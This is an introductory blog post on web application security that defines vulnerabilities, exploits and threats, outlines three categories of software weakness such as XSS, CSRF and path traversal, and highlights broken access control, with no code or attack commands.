coder7475
Posted on August 19, 2024
Introduction
Average cost of data breach in 2020 is $2.86 million, global cyber crime $6 trillion
90% of webapp is vulnerable to hacking & 68% are vulnerable to breach of sensitive data in 2020
As of 2023, the average cost of a data breach in the United States amounted to 9.48 million U.S. dollars, up from 9.44 million U.S. dollars in the previous year.
The global average cost per data breach was 4.45 million U.S. dollars in 2023.
Terminologies
Vulnerability: Security vulnerability is the code flow or a system misconfiguration that hacker can use to gain unauthorized access to a system or network.
Exploit: The method used to exploit a vulnerability. Usually a custom software or a sequence of commands. Exploit kits can be embedded in web pages to scan for vulnerabilities and inject malware or viruses when weakness is found.
Threat: Actual or hypothetical event in which one or more exploits use a vulnerability to mount an attack
Types of vulnerabilities
- Common vulnerabilities and weaknesses. Find on:
Three Category of security weakness
-
Porous defenses: A porous defenses weakness is one that could allow users to bypass or spoof authentication and authorization process. Authentication verifies the identity of something trying to access a system while authentication is the set of access and usage permission. The attacks that happens are: credential stuffing attacks, hijacking of session ids, stealing login credentials or man in the middle attack. Examples of vulnerabilities:
- weak password encoding
- insufficiently protected credentials
- missing or single factor authentication
- insecurity inherited permissions
- sessions that don't expire.
-
Risky Resource management: Such as memory, function and open-source frameworks. The vulnerabilities types:
- out of bound read or write / buffer overflow
- path traversal etc
-
Insecure Interaction between components: This kind of vulnerabilities happens because modern application nowadays send and receive data across a wide range of services, threads and processes.The vulnerabilities are:
- cross site scripting: User inputs are not handled securely enabling injection of client side script into web pages viewed by other users.
- Cross site request forgery: improper verification of whether a seemingly legitimate and authentic request was intentionally sent. These attacks are often mountain via social engineering vectors such as bogus emails that trick a user to click a link which sends a forged request to site where user is already authenticated.
- Attacks of the category happen via backdoor attacks, scripting attacks, worms, trojan horse etc.
Top vulnerability
Broken Access Control
- 94% of application has some sort of broken access control.
- Access control make sure that users cannot act outside of their intended permissions.
- This vulnerability can lead to unauthorized information disclosure, or modification or even destruction of database.
References
Posted on August 19, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.